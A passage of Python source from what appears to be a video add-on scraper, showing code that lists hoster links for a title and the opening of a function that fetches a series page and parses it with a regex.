sMovieTitle)\n oOutputParameterHandler.addParameter('sThumb', sThumb )\n oGui.addLink(SITE_IDENTIFIER, 'redirectHosters', sTitle, sThumb, '', oOutputParameterHandler)\n\n else:\n sHosterUrl = 
aEntry\n oHoster = cHosterGui().checkHoster(sHosterUrl)\n if (oHoster != False):\n oHoster.setDisplayName(sMovieTitle)\n oHoster.setFileName(sMovieTitle)\n cHosterGui().showHoster(oGui, oHoster, sHosterUrl, sThumb)\n\n oGui.setEndOfDirectory()\n\ndef seriesHosters():\n oGui = cGui()\n oParser = cParser()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')\n sThumb = oInputParameterHandler.getValue('sThumb')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n sPattern = '
    .+?